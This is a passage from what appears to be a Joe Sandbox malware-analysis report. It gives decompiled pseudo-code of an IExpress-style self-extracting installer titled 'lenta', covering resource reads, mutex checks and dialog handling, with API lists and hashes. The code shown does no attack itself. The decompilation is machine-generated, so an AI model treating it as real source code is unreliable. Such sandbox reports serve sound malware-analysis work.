							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x291e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x291e4 - 0x5c;
						if( *0x291e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x29124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x29a3c, 0x3e8, 0x28598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00024224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x287a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E000244B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

























                                                                                                                                                                                                                                                0x0002321b
                                                                                                                                                                                                                                                0x0002321e
                                                                                                                                                                                                                                                0x00023221
                                                                                                                                                                                                                                                0x0002343c
                                                                                                                                                                                                                                                0x0002343e
                                                                                                                                                                                                                                                0x0002343f
                                                                                                                                                                                                                                                0x00023445
                                                                                                                                                                                                                                                0x00023447
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023447
                                                                                                                                                                                                                                                0x00023229
                                                                                                                                                                                                                                                0x0002322a
                                                                                                                                                                                                                                                0x0002322f
                                                                                                                                                                                                                                                0x000233ec
                                                                                                                                                                                                                                                0x000233f7
                                                                                                                                                                                                                                                0x00023410
                                                                                                                                                                                                                                                0x00023416
                                                                                                                                                                                                                                                0x0002341d
                                                                                                                                                                                                                                                0x0002342d
                                                                                                                                                                                                                                                0x0002342d
                                                                                                                                                                                                                                                0x00023438
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023438
                                                                                                                                                                                                                                                0x00023237
                                                                                                                                                                                                                                                0x00023243
                                                                                                                                                                                                                                                0x00023243
                                                                                                                                                                                                                                                0x00023246
                                                                                                                                                                                                                                                0x000232ee
                                                                                                                                                                                                                                                0x000232f4
                                                                                                                                                                                                                                                0x000232f6
                                                                                                                                                                                                                                                0x000233d4
                                                                                                                                                                                                                                                0x000233d6
                                                                                                                                                                                                                                                0x000233db
                                                                                                                                                                                                                                                0x000233dc
                                                                                                                                                                                                                                                0x000233de
                                                                                                                                                                                                                                                0x000233df
                                                                                                                                                                                                                                                0x00023370
                                                                                                                                                                                                                                                0x00023372
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023372
                                                                                                                                                                                                                                                0x000232fc
                                                                                                                                                                                                                                                0x00023301
                                                                                                                                                                                                                                                0x00023301
                                                                                                                                                                                                                                                0x00023303
                                                                                                                                                                                                                                                0x00023304
                                                                                                                                                                                                                                                0x00023304
                                                                                                                                                                                                                                                0x0002330a
                                                                                                                                                                                                                                                0x0002330d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023313
                                                                                                                                                                                                                                                0x00023318
                                                                                                                                                                                                                                                0x0002331a
                                                                                                                                                                                                                                                0x00023331
                                                                                                                                                                                                                                                0x00023332
                                                                                                                                                                                                                                                0x0002333a
                                                                                                                                                                                                                                                0x0002333d
                                                                                                                                                                                                                                                0x0002337c
                                                                                                                                                                                                                                                0x00023388
                                                                                                                                                                                                                                                0x0002338f
                                                                                                                                                                                                                                                0x00023394
                                                                                                                                                                                                                                                0x00023396
                                                                                                                                                                                                                                                0x000233a4
                                                                                                                                                                                                                                                0x000233ab
                                                                                                                                                                                                                                                0x000233b6
                                                                                                                                                                                                                                                0x000233be
                                                                                                                                                                                                                                                0x000233c3
                                                                                                                                                                                                                                                0x000233c5
                                                                                                                                                                                                                                                0x00023435
                                                                                                                                                                                                                                                0x00023437
                                                                                                                                                                                                                                                0x00023437
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023437
                                                                                                                                                                                                                                                0x000233c7
                                                                                                                                                                                                                                                0x000233c9
                                                                                                                                                                                                                                                0x000233cc
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000233cc
                                                                                                                                                                                                                                                0x000233ad
                                                                                                                                                                                                                                                0x000233b4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000233b4
                                                                                                                                                                                                                                                0x00023398
                                                                                                                                                                                                                                                0x00023399
                                                                                                                                                                                                                                                0x0002339b
                                                                                                                                                                                                                                                0x0002339c
                                                                                                                                                                                                                                                0x0002339d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002339d
                                                                                                                                                                                                                                                0x0002334c
                                                                                                                                                                                                                                                0x00023351
                                                                                                                                                                                                                                                0x00023354
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002335c
                                                                                                                                                                                                                                                0x00023362
                                                                                                                                                                                                                                                0x00023364
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023366
                                                                                                                                                                                                                                                0x00023367
                                                                                                                                                                                                                                                0x00023369
                                                                                                                                                                                                                                                0x0002336a
                                                                                                                                                                                                                                                0x0002336b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002336b
                                                                                                                                                                                                                                                0x0002331c
                                                                                                                                                                                                                                                0x00023323
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023329
                                                                                                                                                                                                                                                0x0002332b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002332b
                                                                                                                                                                                                                                                0x0002324c
                                                                                                                                                                                                                                                0x0002324c
                                                                                                                                                                                                                                                0x0002324f
                                                                                                                                                                                                                                                0x000232c8
                                                                                                                                                                                                                                                0x000232ce
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000232ce
                                                                                                                                                                                                                                                0x00023251
                                                                                                                                                                                                                                                0x00023256
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023271
                                                                                                                                                                                                                                                0x00023277
                                                                                                                                                                                                                                                0x00023279
                                                                                                                                                                                                                                                0x00023298
                                                                                                                                                                                                                                                0x0002329d
                                                                                                                                                                                                                                                0x0002329f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000232b0
                                                                                                                                                                                                                                                0x000232b6
                                                                                                                                                                                                                                                0x000232b8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000232be
                                                                                                                                                                                                                                                0x00023280
                                                                                                                                                                                                                                                0x00023289
                                                                                                                                                                                                                                                0x0002328e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002328e
                                                                                                                                                                                                                                                0x0002327b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002327b
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadStringA.USER32(000003E8,00028598,00000200), ref: 00023271
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 000233E2
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 000233F7
                                                                                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00023410
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000836), ref: 00023426
                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000), ref: 0002342D
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 0002343F
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$lenta
                                                                                                                                                                                                                                                • API String ID: 2418873061-2207793050
                                                                                                                                                                                                                                                • Opcode ID: cf5d80e24ea61f5b7ce2c1bbc1839caf59d5035aefbcab4a99a64df21348e7d9
                                                                                                                                                                                                                                                • Instruction ID: 57ae641635a32d666355b360404b535e52b49a16374baeea09c5c6eab8779692
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf5d80e24ea61f5b7ce2c1bbc1839caf59d5035aefbcab4a99a64df21348e7d9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66513A30341270BBFB71AB357C8DFBF6999DB46B64F204068F645961D1CEAC9B029261
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00022CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183synchronizationCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E00022CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x28004; // 0xf4950d3e
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x29a3c = __ecx;
				memset(0x29140, 0, 0x8fc);
				memset(0x28a20, 0, 0x32c);
				memset(0x288c0, 0, 0x104);
				 *0x293ec = 1;
				_t20 = E0002468F("TITLE", 0x29154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x2858c = _t27;
					SetEvent(_t27);
					_t64 = 0x29a34;
					if(E0002468F("EXTRACTOPT", 0x29a34, 4) != 0) {
						if(( *0x29a34 & 0x000000c0) == 0) {
							L12:
							 *0x29120 =  *0x29120 & _t65;
							if(E00025C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x28a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x28184 != 0) {
										__imp__#17();
									}
									if( *0x28a24 == 0) {
										_t57 = _t65;
										if(E000236EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x29a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x29a34 & 0x00000100) == 0 || ( *0x28a38 & 0x00000001) != 0 || E000218A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00026517(_t57, 0x7d6, _t34, E000219E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00022390(0x28a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E000244B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E0002468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x28588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x29a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E000244B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E000244B9(0, 0x54b, "lenta", 0, 0x10, 0);
										L11:
										CloseHandle( *0x28588);
										 *0x29124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E000244B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x29124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00026CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}



















                                                                                                                                                                                                                                                0x00022cb5
                                                                                                                                                                                                                                                0x00022cbc
                                                                                                                                                                                                                                                0x00022cc7
                                                                                                                                                                                                                                                0x00022cc9
                                                                                                                                                                                                                                                0x00022cd1
                                                                                                                                                                                                                                                0x00022cd3
                                                                                                                                                                                                                                                0x00022cd9
                                                                                                                                                                                                                                                0x00022ce9
                                                                                                                                                                                                                                                0x00022cf9
                                                                                                                                                                                                                                                0x00022d0e
                                                                                                                                                                                                                                                0x00022d15
                                                                                                                                                                                                                                                0x00022d1c
                                                                                                                                                                                                                                                0x00022ef3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022d2d
                                                                                                                                                                                                                                                0x00022d34
                                                                                                                                                                                                                                                0x00022d3b
                                                                                                                                                                                                                                                0x00022d40
                                                                                                                                                                                                                                                0x00022d48
                                                                                                                                                                                                                                                0x00022d59
                                                                                                                                                                                                                                                0x00022d84
                                                                                                                                                                                                                                                0x00022e1f
                                                                                                                                                                                                                                                0x00022e1f
                                                                                                                                                                                                                                                0x00022e2e
                                                                                                                                                                                                                                                0x00022e41
                                                                                                                                                                                                                                                0x00022e5a
                                                                                                                                                                                                                                                0x00022e62
                                                                                                                                                                                                                                                0x00022e6c
                                                                                                                                                                                                                                                0x00022e6c
                                                                                                                                                                                                                                                0x00022e75
                                                                                                                                                                                                                                                0x00022e77
                                                                                                                                                                                                                                                0x00022e77
                                                                                                                                                                                                                                                0x00022e84
                                                                                                                                                                                                                                                0x00022e8b
                                                                                                                                                                                                                                                0x00022e94
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022e96
                                                                                                                                                                                                                                                0x00022e96
                                                                                                                                                                                                                                                0x00022e9e
                                                                                                                                                                                                                                                0x00022ea2
                                                                                                                                                                                                                                                0x00022eba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022ece
                                                                                                                                                                                                                                                0x00022ede
                                                                                                                                                                                                                                                0x00022eed
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022eed
                                                                                                                                                                                                                                                0x00022eef
                                                                                                                                                                                                                                                0x00022eef
                                                                                                                                                                                                                                                0x00022eef
                                                                                                                                                                                                                                                0x00022eef
                                                                                                                                                                                                                                                0x00022ea2
                                                                                                                                                                                                                                                0x00022e86
                                                                                                                                                                                                                                                0x00022e88
                                                                                                                                                                                                                                                0x00022e88
                                                                                                                                                                                                                                                0x00022e43
                                                                                                                                                                                                                                                0x00022e48
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022e48
                                                                                                                                                                                                                                                0x00022e30
                                                                                                                                                                                                                                                0x00022e30
                                                                                                                                                                                                                                                0x00022ef8
                                                                                                                                                                                                                                                0x00022f01
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022f01
                                                                                                                                                                                                                                                0x00022d8a
                                                                                                                                                                                                                                                0x00022d8f
                                                                                                                                                                                                                                                0x00022da1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022da3
                                                                                                                                                                                                                                                0x00022dae
                                                                                                                                                                                                                                                0x00022db4
                                                                                                                                                                                                                                                0x00022dbb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022dca
                                                                                                                                                                                                                                                0x00022dd3
                                                                                                                                                                                                                                                0x00022df5
                                                                                                                                                                                                                                                0x00022e02
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022dd5
                                                                                                                                                                                                                                                0x00022dde
                                                                                                                                                                                                                                                0x00022de3
                                                                                                                                                                                                                                                0x00022e04
                                                                                                                                                                                                                                                0x00022e0a
                                                                                                                                                                                                                                                0x00022e10
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022e10
                                                                                                                                                                                                                                                0x00022dd3
                                                                                                                                                                                                                                                0x00022dbb
                                                                                                                                                                                                                                                0x00022da1
                                                                                                                                                                                                                                                0x00022d5b
                                                                                                                                                                                                                                                0x00022d5b
                                                                                                                                                                                                                                                0x00022d5d
                                                                                                                                                                                                                                                0x00022d69
                                                                                                                                                                                                                                                0x00022d6e
                                                                                                                                                                                                                                                0x00022f06
                                                                                                                                                                                                                                                0x00022f06
                                                                                                                                                                                                                                                0x00022f06
                                                                                                                                                                                                                                                0x00022d59
                                                                                                                                                                                                                                                0x00022f18

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00022CD9
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00022CE9
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00022CF9
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246A0
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: SizeofResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246A9
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246C3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LoadResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246CC
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LockResource.KERNEL32(00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246D3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: memcpy_s.MSVCRT ref: 000246E5
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000246EF
                                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00022D34
                                                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00022D40
                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00022DAE
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00022DBD
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00022E0A
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00024518
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00024554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                                                                                                                                                                                                • API String ID: 1002816675-2993962200
                                                                                                                                                                                                                                                • Opcode ID: 90caf06005b86a23884eef31f5010d75eb67544a89344867a2ab56982580d048
                                                                                                                                                                                                                                                • Instruction ID: b68e82a08cc7a7e1da32028f22b58db7f9eaf58192e723e2c37534c230adbdab
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 90caf06005b86a23884eef31f5010d75eb67544a89344867a2ab56982580d048
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6851D370700331BBFBB0ABA0BD4ABBA26D8EB45710F218035F945D51D6DEBC88529726
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000234F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119threadwindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                                                                                                                			E000234F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x291d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x28584 = _t35;
					E000243D0(_t35, GetDesktopWindow());
					__eflags =  *0x28184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "lenta");
					_t17 = CreateThread(0, 0, E00024FE0, 0, 0, 0x28798);
					 *0x2879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E000244B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x2858c);
					_t38 =  *0x28584; // 0x0
					_t25 = E000244B9(_t38, 0x4b2, 0x21140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x291d8 = 1;
						SetEvent( *0x2858c);
						_t39 =  *0x2879c; // 0x0
						E00023680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x2858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x2879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}












                                                                                                                                                                                                                                                0x000234fb
                                                                                                                                                                                                                                                0x000234fe
                                                                                                                                                                                                                                                0x00023665
                                                                                                                                                                                                                                                0x00023666
                                                                                                                                                                                                                                                0x00023666
                                                                                                                                                                                                                                                0x00023668
                                                                                                                                                                                                                                                0x0002366e
                                                                                                                                                                                                                                                0x0002366e
                                                                                                                                                                                                                                                0x00023671
                                                                                                                                                                                                                                                0x00023671
                                                                                                                                                                                                                                                0x00023677
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023677
                                                                                                                                                                                                                                                0x00023504
                                                                                                                                                                                                                                                0x00023506
                                                                                                                                                                                                                                                0x00023507
                                                                                                                                                                                                                                                0x0002350c
                                                                                                                                                                                                                                                0x0002365b
                                                                                                                                                                                                                                                0x0002365f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023661
                                                                                                                                                                                                                                                0x00023512
                                                                                                                                                                                                                                                0x00023515
                                                                                                                                                                                                                                                0x000235be
                                                                                                                                                                                                                                                0x000235c1
                                                                                                                                                                                                                                                0x000235d1
                                                                                                                                                                                                                                                0x000235d8
                                                                                                                                                                                                                                                0x000235de
                                                                                                                                                                                                                                                0x000235f8
                                                                                                                                                                                                                                                0x00023617
                                                                                                                                                                                                                                                0x00023617
                                                                                                                                                                                                                                                0x00023623
                                                                                                                                                                                                                                                0x00023637
                                                                                                                                                                                                                                                0x0002363d
                                                                                                                                                                                                                                                0x00023642
                                                                                                                                                                                                                                                0x00023644
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023646
                                                                                                                                                                                                                                                0x00023652
                                                                                                                                                                                                                                                0x00023657
                                                                                                                                                                                                                                                0x00023658
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023658
                                                                                                                                                                                                                                                0x00023644
                                                                                                                                                                                                                                                0x0002351b
                                                                                                                                                                                                                                                0x0002351d
                                                                                                                                                                                                                                                0x0002354f
                                                                                                                                                                                                                                                0x00023553
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002355f
                                                                                                                                                                                                                                                0x00023565
                                                                                                                                                                                                                                                0x0002357c
                                                                                                                                                                                                                                                0x00023581
                                                                                                                                                                                                                                                0x00023584
                                                                                                                                                                                                                                                0x0002359b
                                                                                                                                                                                                                                                0x000235a1
                                                                                                                                                                                                                                                0x000235a7
                                                                                                                                                                                                                                                0x000235ad
                                                                                                                                                                                                                                                0x000235b3
                                                                                                                                                                                                                                                0x000235b8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000235b8
                                                                                                                                                                                                                                                0x00023586
                                                                                                                                                                                                                                                0x00023588
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023590
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023590
                                                                                                                                                                                                                                                0x00023524
                                                                                                                                                                                                                                                0x00023535
                                                                                                                                                                                                                                                0x00023541
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023549
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • TerminateThread.KERNEL32(00000000), ref: 00023535
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00023541
                                                                                                                                                                                                                                                • ResetEvent.KERNEL32 ref: 0002355F
                                                                                                                                                                                                                                                • SetEvent.KERNEL32(00021140,00000000,00000020,00000004), ref: 00023590
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 000235C7
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 000235F1
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000), ref: 000235F8
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 00023610
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000), ref: 00023617
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 00023623
                                                                                                                                                                                                                                                • CreateThread.KERNEL32 ref: 00023637
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 00023671
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
